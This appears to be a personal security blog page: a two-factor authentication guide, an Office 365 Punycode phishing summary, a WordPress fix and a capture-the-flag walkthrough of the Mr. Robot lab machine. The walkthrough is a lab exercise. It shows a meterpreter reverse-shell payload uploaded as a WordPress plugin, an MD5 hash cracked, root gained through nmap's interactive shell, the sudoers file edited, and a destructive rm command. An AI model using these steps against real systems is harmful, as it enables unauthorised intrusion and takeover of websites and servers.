| Acknowledgement.com

KING.NET Email Address

Posted by EM MAJ_COM On Friday, February 10, 2017 0 comments
Manage your business, not your E-mail. We provides reliable uptime, global scalability, and world class security powered by Google Apps. Doing business in the computing cloud means you’re always current – no more maintenance, upgrades, security patches or hassles. You can re-allocate your in-house IT to other productive projects.
Got your email @KING.NET? Please go to http://mail.king.net to login to your email address, password and your pin. For your email security, it is highly recommended that you enable the Two-Factor Authentication to access your email.
Your email is accessible using the following:
  • Any modern internet browser e.g. Internet Explorer (IE), Google Chrome, Mozilla Firefox, Safari and others.
  • Smart Phones e.g. iPhone, Android, etc.
Examples of Email Addresses to register: Please note email address @KING.NET is a premium identity for very important person like yourself. You can only get your own email @KING.NEt here. Some example of premium email address using @KING.NET
  • Saudi@King.net
  • Charles@King.net
  • Royal@King.net
  • James@King.net
  • Peter@King.net
  • and of course your own Name@KING.NET

Enable 2Factor Authentication to protect your Email Account.

Posted by EM MAJ_COM On Friday, January 06, 2017 0 comments
Retune.com - Email Security
Retune.com - Email Security
Your email address is the center of your security world. It is highly recommended that you enable Two-Factor Authentication to minimize risk of someone accessing your email through spear phishing attack, discover caches of passwords in your mailbox, and other related email attack. As an example, the attacker of DNC email uses a simple password reset request through spear phishing attack, was able to gain access to the email and password. If the Two-Factor Authentication is enabled, it will require another layer of security through verification code and stop it.



Two-Factor Authentication or 2-Step Verification adds an extra layer of security to your email account by requiring you to enter a verification code in addition to your username and password when signing into your email account. It help protect a user's account from unauthorized access should someone manage to obtain their password. Even if a password is cracked, guessed, or otherwise stolen, an attacker can't sign in without access to the user's additional verification. This verification can be in the form of codes which only the user can obtain via their own mobile phone.

Requirement. To use Two-Factor Authentication you need to have a mobile phone that can receive the verification code via text message or phone call. Other devices use the Google Authenticator mobile app to generate the verification code.

How to enable Two-Factor Authentication?
Retune.com - Cyber Security
Retune.com - Cyber Security
Using Gmail or white label domain name.
  • Login to your email, go to https://www.gmail.com, enter your email address and password.
  • Click your name icon (upper right corner), then click My Account
Google provided a detailed step-by-step procedure on how to enable it. You will see Security Checkup, click on Get Started and follow the steps.
  1. Check your recovery information.
  2. Check your connected devices
  3. Check your account permissions
  4. Check your app password. This is to create password for your MS Outlook or other email reader application.
  5. Check your Two-Factor settings

Have a safe computing experience.

Source: Que.com
The latest version of WordPress is v4.7. It is always recommended to upgrade to the latest released to minimize vulnerabilities (exposure) and improve use of content management service.
Always backup before you upgrade, copy your WordPress files and download the database. This will give us way to roll-back just in case we run into "unknown" issue. It is not always perfect when you upgrade.
During my upgrade to v4.7 to one of my customer website. I've got this error.
Fatal error: Call to a member function do_all_hook() on a non-object in /home/public_html/wp-includes/plugin.php on line 837
A quick fix is to re-upload the plugin.php file from my old backup to the /wp-includes folder. This works!
But I want to use the latest plugin.php file not the old copy. Searching the internet trying to find out if anyone has encounter the same error when upgrading to the latest version of wordpress. No surprise! It is already been discussed, issue and alternative solutions to fix it.
I found the solution. I disabled this file "/wp-content/object-cache.php" by renaming it to object-cache.DISABLED.php or deleting will work as well. I don't know the use of this file at this point.
I re-uploaded the latest plugin.php to /wp-includes/ folder. Tested my website and happy with the result. 
I hope this help.
Source: Que.com

A new phishing attack targeting Office 365 business email users

Posted by EM MAJ_COM On Friday, December 16, 2016 0 comments
A new phishing attack targeting Office 365 business email users was found using Punycode to go undetected by both Microsoft’s default security and desktop email filters, Avanan security researchers warn.
The attack is meant to steal Office 365 credentials and abuses a vulnerability in how Office 365 anti-phishing and URL reputation security layers deal with Punycode. The attack starts with fake FedEX email that include benign looking URLs meant to take users to malicious website. See image below.
office-365-business-users-targeted-in-punycode-based-phishing
By using Punycode and leveraging said flaw in the phish-detection engine, the URL actually resolves to two different domains, one safe, which is detected by Office 365, and the other malicious, which is followed by the browser.
The underlining issue is that Office 365’s default security treats the domain as plain ASCII when verifying whether it is legitimate or not. Because all modern browsers support Unicode character, the address is translated to its Unicode format when launched in the browser. This address is malicious and presents users with a fake Office 365 login page in an attempt to steal user credentials.
How to protect against phishing email or spear phishing email intended for the big fish in our organization?
  • Do not click in any links asking you to reset your password. Make it as a habit, never click on a link from your email :)
  • Use Two-Factor Authentication. I highly recommend that you use Two-Factor authentication when available, for your bank accounts, social networks e.g. LinkedIn, Facebook, etc. (The Two-Factor authentication is not available to Kiosk Email user.)
The Phishing Email is the same old method used when a malicious person, asking you to change your bank account password, compromised bank accounts, deposited money on your bank, UPS delivery, social media accounts, free Redskins ticket, free Washington Wizards tickets, and many other variations of fake email. According to PhishMe91% of CyberAttacks start with a Phishing Email. The hacked incidents of high profile staff at DNC is through phishing emails. Using this method is cheap, hard to detect, and easy to deploy.
Security awareness of everyone is important to minimize our exposure.
What is the worst case scenario if you click on a “bait” links?
  • The malicious user will have access to your account. For example, your email, social media, banks account, etc.
  • Or The malicious user will have full control of your computer through “reverse shell” access. Where they can see all files, install a back-door program to get back in, use your webcam, use your computer as bot for DDOS attack, anything they want.
What to do if you accidentally click a “bait” links?
  • When you click on a “bait” link or a bad attachment, you think nothing happen and move on with your routine tasks. But the malicious code is already executed in the background, you will not notice it that’s how it is design. Don’t ignore this simple mistake, reboot your workstation right away, this will end the session initiated by clicking the bad link.
  • Scan your workstation using your anti-virus/anti-malware software.
  • Report to your immediate supervisor or post in our comment below. Our community is willing to help.
The Center for Development of Security Excellence (CDSE.edu) website provides a fun way to test your awareness against Phishing Scams. Go to http://www.cdse.edu/shorts/cybersecurity.html# website, check the Phishing Scams video “Phishing Scams Avoid the Bait” and have fun.
Reference links:

CTF – Hacking Mr. Robot

Posted by EM MAJ_COM On Wednesday, December 14, 2016 0 comments
Another learning experience to improve my penetration testing skills by hacking Mr. Robot virtual machine as my target machine.
My private network for this penetration testing exercise.
  • Kali Linux, my tool to exploit the target machine. IP Address 192.168.159.131
  • Mr.Robot, my target machine. IP Address: Unknown
que-com-mr-robotLet's begin. My objective is to find the three hidden keys.
Sponsored by Termed.com Life Insurance.
I have no knowledge of my target machine (Mr. Robot) IP Address, so let me begin running nmap tool. Of course, you can also use other network discovery tool to scan your network. I prefer nmap tool, it is available to my pentest machine.
root@kali:~# nmap -T4 192.168.159.0/24
Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-30 10:41 EST
Nmap scan report for 192.168.159.131
Host is up (0.00037s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:F8:73:37 (VMware)
Nmap scan report for 192.168.159.254
Host is up (0.00015s latency).
All 1000 scanned ports on 192.168.231.254 are filtered
MAC Address: 00:50:56:F4:2B:CA (VMware)
Nmap scan report for 192.168.159.130
Host is up (0.0000050s latency).
All 1000 scanned ports on 192.168.159.131 are closed
Nmap done: 256 IP addresses (3 hosts up) scanned in 39.00 seconds
root@kali:~#
I discovered my target machine IP address 192.168.159.130 and open ports. That's a basic enumeration, scanning my private network.
Port 80 and 443 are interesting ports to start poking around. Let's see what's on this website. I'm calling firefox program direct from the command prompt, of course you can simply click on the Firefox icon and enter the IP Address of the web server. It's cool to use CLI to run a command.
root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/
The website started loading a javascript, looks like loading a linux environment.
que-com-ctp-mr-robot-webpage
Opening the source code, got this fancy "Your are not alone".
que-com-ctp-mr-robot-webpage-javascript
Checking to see if I can use any of this information to hack Mr.Robot box.
Nothing so far. I will come back to this webpage later on.
Let's try using "dirbuster" to know our target website.
root@kali:~/KING.NET/mr.robot# dirb http://192.168.159.130/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Nov 30 19:18:31 2016
URL_BASE: http://192.168.159.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.159.130/ ----
==> DIRECTORY: http://192.168.159.130/0/
==> DIRECTORY: http://192.168.159.130/admin/
+ http://192.168.159.130/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.159.130/audio/
==> DIRECTORY: http://192.168.159.130/blog/
==> DIRECTORY: http://192.168.159.130/css/
+ http://192.168.159.130/dashboard (CODE:302|SIZE:0)
+ http://192.168.159.130/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/feed/
==> DIRECTORY: http://192.168.159.130/image/
==> DIRECTORY: http://192.168.159.130/Image/
==> DIRECTORY: http://192.168.159.130/images/
+ http://192.168.159.130/index.html (CODE:200|SIZE:1077)
+ http://192.168.159.130/index.php (CODE:301|SIZE:0)
+ http://192.168.159.130/intro (CODE:200|SIZE:516314)
==> DIRECTORY: http://192.168.159.130/js/
http://192.168.159.130/license (CODE:200|SIZE:309)
http://192.168.159.130/login (CODE:302|SIZE:0)
+ http://192.168.159.130/page1 (CODE:301|SIZE:0)
+ http://192.168.159.130/phpmyadmin (CODE:403|SIZE:94)
+ http://192.168.159.130/rdf (CODE:301|SIZE:0)
+ http://192.168.159.130/readme (CODE:200|SIZE:64)
http://192.168.159.130/robots (CODE:200|SIZE:41)
http://192.168.159.130/robots.txt (CODE:200|SIZE:41)
+ http://192.168.159.130/rss (CODE:301|SIZE:0)
+ http://192.168.159.130/rss2 (CODE:301|SIZE:0)
+ http://192.168.159.130/sitemap (CODE:200|SIZE:0)
http://192.168.159.130/sitemap.xml (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/video/
==> DIRECTORY: http://192.168.159.130/wp-admin/
+ http://192.168.159.130/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/wp-content/
+ http://192.168.159.130/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/wp-includes/
+ http://192.168.159.130/wp-links-opml (CODE:200|SIZE:227)
+ http://192.168.159.130/wp-load (CODE:200|SIZE:0)
http://192.168.159.130/wp-login (CODE:200|SIZE:2627)
--- snip --- dirbuster still running.
I have to cancel it. I think I have enough information to start digging. There are so much information from this dir results. Getting to know of some sub-folders e.g. /admin, /blog, /license, /phyadmin, /wp-admin, /wp-login, /wp-config, etc. I think Mr.Robot box website is using a WordPress content management system. Nice.
Checking the following sub-folder.
root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/license
A webpage with this content "what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?"
Sponsored by Termed.com Life Insurance.
Continue to scroll down 'till the end of the page to see this text "
do you want a password or something?" and this code.
ZWxsaW90OkVSMjgtMDY1Mgo=
Copied to nano and save as 1stdump.txt to check for base64. Run base64 -d -i 1stdump.txt
root@kali:~/KING.NET/mr.robot# nano 1stdump.txt
root@kali:~/KING.NET/mr.robot# base64 -d -i 1stdump.txt
elliot:ER28-0652
root@kali:~/KING.NET/mr.robot#
Look like we have elliot:ER28-0652 username and maybe a password. Let's try to login to Mr.Robot virtual machine and if this account information work.
No luck! Continue hacking the box :(.
Let me try using this account here, http://192.168.159.130/wp-admin. It's a success!
que-com-ctp-mr-robot-wordpress
Checking the user, "elliot" username is also the Administrator. Jackpot! And another user micho05654 role as subcriber. I will ignore this subscriber user, and focus to elliot as administrator.
que-com-ctp-mr-robot-wordpress-admin
Now, I can control this box from here. Exploiting the WordPress CMS since I have an Administrator rights through a reverse shell. Let Kali virtual machine do the work for us. Click on Applications, Exploitation Tools, then click MSF Payload. It will open the MSFVenom Payload Creator in a new terminal window. I run the command below.
root@kali:~# msfpc php 192.168.159.131 443 msf reverse stageless tcp
This command interpret to run msfpc payload create using type php, the IP address e.g. 192.168.159.131 of the attacker using port 433, using msf for cross platform shell gaining full power of metasploit, reverse to make the target connect back to the attacker in a complete stand alone payload (stageless), using tcp standard method of connecting back. I hope that make sense to you, otherwise type --help for more details.
root@kali:~# msfpc php 192.168.159.131 443 msf reverse stageless tcp
[*] Msfvenom Payload Creator (MPC v1.4.3)
[i] IP: 192.168.159.131
[i] PORT: 443
[i] TYPE: php (php/meterpreter_reverse_tcp)
[i] CMD: msfvenom -p php/meterpreter_reverse_tcp -f raw \
--platform php -e generic/none -a php LHOST=192.168.159.131 LPORT=443 \
> '/root/php-meterpreter-stageless-reverse-tcp-443.php'
[i] php meterpreter created: '/root/php-meterpreter-stageless-reverse-tcp-443.php'
[i] MSF handler file: '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
[i] Run: msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
[?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080
[*] Done!
After running the MSFVenom Payload Creator, the program generated two files:
  1. php-meterpreter-stageless-reverse-tcp-443.php
  2. php-meterpreter-stageless-reverse-tcp-443-php.rc
And the command to run "msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'". All ready for me to execute.
root@kali:~# msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
My listening (attacker) machine ready and waiting for connection.
resource (/root/php-meterpreter-stageless-reverse-tcp-443-php.rc)> run -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.159.131:443
[*] Starting the payload handler...
msf exploit(handler) >
The MSFVenom Payload Creator also provided a website that I can use to exploit my target e.g. python -m SimpleHTTPServer 8080. But in this scenario, I will not use it because I already have administrator access to the WordPress site. All I need to do is install my payload through WordPress as plugin. At this point, I can create havoc to the WordPress installation by deleting contents but the main goal is to own the box (pwn to root or pwn 2 r00t).
I will edit the php file with additional information so I can use it as WordPress plugin. Here's the updated php file.
/*
Plugin Name: Pwn-to-Root
Plugin URI: http://www.king.net
Description: A demo using WordPress to establish a reverse shell.
Author: EM @ KING.NET
Version: v1.0
Author URI: http://www.king.net
*/
//<?php if (!isset($GLOBALS['channels'])) { $GLOBALS['channels'] = array(); } if (!isset$
Then zip the php file.
root@kali:~# zip php-meterpreter-stageless-reverse-tcp-443.zip php-meterpreter-stageless-reverse-tcp-443.php
adding: php-meterpreter-stageless-reverse-tcp-443.php (deflated 76%)
root@kali:~#
The payload is now ready. I can use the zip file to upload as plugin in WordPress management console. Let's go back to the WordPress admin page. In Plugin, click add new plugin, then upload the zip file. Browse the zip file, click Install Now. Wait to complete the upload.
que-com-ctp-mr-robot-wordpress-activateplugin
I've already started the listening machine (above), so all I need to do is click Activate Plugin to create the reverse access. When I check my listening machine, I see our session.
[*] Meterpreter session 1 opened (192.168.159.131:443 -> 192.168.159.130:39959) at 2016-12-03 23:39:58 -0500
From the listening machine, type help to check all available commands.
msf exploit(handler) > help sessions
Type "sessions"
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter php/linux daemon (1) @ linux 192.168.159.131:443 -> 192.168.159.130:39959 (192.168.159.130)
msf exploit(handler) >
Type "help sessions" to see options on how to connect using sessions.
msf exploit(handler) > help sessions
Usage: sessions [options]
Active session manipulation and interaction.
OPTIONS:
-K Terminate all sessions
-c <opt> Run a command on the session given with -i, or all
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate sessions by session ID and/or range
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s <opt> Run a script on the session given with -i, or all
-t <opt> Set a response timeout (default: 15)
-u <opt> Upgrade a shell to a meterpreter session on many platforms
-v List sessions in verbose mode
-x Show extended information in the session table
Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
Now, I can connect to session id 1 using -i option for Interact with supplied session ID
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
We are now in session. From here I can use local commands using Mr.Robot machine  e.g. ls, pwd
meterpreter > pwd
---snip --
00644/rw-r--r-- 19642 fil 2015-09-16 06:49:06 -0400 user-new.php
100644/rw-r--r-- 16552 fil 2015-09-16 06:49:06 -0400 users.php
100644/rw-r--r-- 16143 fil 2015-09-16 06:49:06 -0400 widgets.php
meterpreter > pwd
/opt/bitnami/apps/wordpress/htdocs/wp-admin
meterpreter >
Let me check the home directory.
meterpreter > ls /home
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2015-11-13 02:20:08 -0500 robot
I see robot directory, continue digging ...
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2015-11-13 02:20:08 -0500 robot
meterpreter > cd robot
meterpreter > ls
Listing: /home/robot
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100400/r-------- 33 fil 2015-11-13 02:28:21 -0500 key-2-of-3.txt
100644/rw-r--r-- 39 fil 2015-11-13 02:28:21 -0500 password.raw-md5
meterpreter >
In /home/robot directory, two files found
  1. key-2-of-3.txt
  2. password.raw-md5
I can't access the "key-2-of-3.txt"  file because it is only available (r--------) owner, e.g. user "robot". See error below, but "password.raw-md5" is available (rw-r--r--)
meterpreter > cat key-2-of-3.txt
[-] core_channel_open: Operation failed: 1
meterpreter > cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
meterpreter >
The "robot:c3fcd3d76192e4007dfb496cca67e13b" stands for username:password. I've used online MD5 decryter tool (hashkiller.co.uk) to produce the value of "c3fcd3d76192e4007dfb496cca67e13b" to "abcdefghijklmnopqrstuvwxyz". Wow! the password is so basic. If I run a password cracker earlier, I'm sure I can get this password in under 2 minutes. Anyway, let me login to Mr.Robot box using this username (robot) and password (abcdefghijklmnopqrstuvwxyz).
que-com-ctp-mr-robot-boxaccess
Successfully login as robot and (abcdefghijklmnopqrstuvwxyz). Run ls command to check directory listing.
que-com-ctp-mr-robot-list
Run "cat key-2-of-3.txt" to view the file.
que-com-ctp-mr-robot-key2
Check if I can "ls /root"
que-com-ctp-mr-robot-list-root
Oops ... it seems more research for me to get the root access.
After long hours of research and reading other penetration testing website/blogs...
I checked Mr.Robot box nmap version.
que-com-ctp-mr-robot-nmap
I can use "nmap --interactive" using !bash to runs shell command.
que-com-ctp-mr-robot-nmap-bash
No luck.
Now, trying !sh to runs shell command. Type "exit" to get out of bash command.
que-com-ctp-mr-robot-nmap-sh-key3
It's a success using !sh command. Checking /root/firstboot_done it's empty, and /root/key-3-of-3.txt produce our key "04787ddef27c3dee1ee161b21670b4e4".
At this time. I discovered 2 out of 3 keys as listed below.
  1. key-1-of-3.txt - ?
  2. key-2-of-3.txt "822c73956184f694993bede3eb39f959"
  3. key-3-of-3.txt "04787ddef27c3dee1ee161b21670b4e4".
What's next after getting root access? I'm not done yet, my user "robot" still a standard account. I can escalate the privilege of user "robot" to "root" through editing sudoers file to add "robot ALL=(ALL) ALL". Type nano /etc/sudoers to add "robot ALL=(ALL) ALL".
que-com-ctp-mr-robot-nano-sudoers
Save it. Exit !sh command, quit nmap, run sudo ls, then enter the robot password. If everything goes well, I can run sudo su for super user.
que-com-ctp-mr-robot-rooted
Rooted!
Sponsored by Termed.com Life Insurance.
From here, I can do anything to Mr.Robot virtual machine. I can even delete this box by running a command "# rm -r --no-preserve-root".
I still need to find the value of key-1-of-3.txt. Going back to the website, check other sub-folders.
Checking the http://192.168.159.130/robots/ web page got nothing.
Checking the http://192.168.159.130/robots.txt file,  shows an interesting information e.g. fsocity.dic and key-1-of-3.txt. Let's download these files and investigate.
root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
run wget http://192.168.159.130/fsocity.dic
root@kali:~/KING.NET/mr.robot# wget http://192.168.159.130/fsocity.dic
--2016-12-03 15:13:04-- http://192.168.159.130/fsocity.dic
Connecting to 192.168.159.130:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’
fsocity.dic 100%[=======================>] 6.91M 20.0MB/s in 0.3s
2016-12-03 15:13:06 (20.0 MB/s) - ‘fsocity.dic’ saved [7245381/7245381]
The fsocity.dic is 6.91M filesize, it could be a word list.
Let me download the text file too.
root@kali:~/KING.NET/mr.robot# wget http://192.168.159.130/key-1-of-3.txt
--2016-12-03 15:14:47-- http://192.168.159.130/key-1-of-3.txt
Connecting to 192.168.159.130:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33 [text/plain]
Saving to: ‘key-1-of-3.txt’
key-1-of-3.txt 100%[=======================>] 33 --.-KB/s in 0s
2016-12-03 15:14:47 (4.97 MB/s) - ‘key-1-of-3.txt’ saved [33/33]
The key-1-of-3.txt filesize is only 33KB, very small.
I run cat fsocity.dic to check the content, and confirmed it is a dictionary file. I run cat key-1-of-3.txt and produce this result.
root@kali:~/KING.NET/mr.robot# cat key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
Found it. key-1-of-3.txt value is "073403c8a58a1f80d943455fb30724b9"
So all keys discovered!
  1. key-1-of-3.txt "073403c8a58a1f80d943455fb30724b9"
  2. key-2-of-3.txt "822c73956184f694993bede3eb39f959"
  3. key-3-of-3.txt "04787ddef27c3dee1ee161b21670b4e4".

That's fun ...
Thank you for reading my walk through. I will create a follow video later this week.
And I'm still catching up to all the challenge provided by Vulnhub.com website.
Thank you,
Useful links:
First things first: Connect through one of the following social media tools below:
Enter your email address:
Subscribe to KING.NET by Email http://www.twitter.com/kingnet
http://www.randompage.com/profile/king
Moscom.com Web Hosting 24x7 Phone Support. The ultimate in performance, control, and convenience.

QueUSA Solar Charger on the go.
NeedName.com - Domain Name Registration and DNS Management.
Breeder.co - All about Pets.
Pet By OWner.
Moscom.com Web Hosting, SSL, Email, DomainName, and Dedicated Server.
For Ad Campaign, please send email to Support[@]Whaddya.com. Thank you.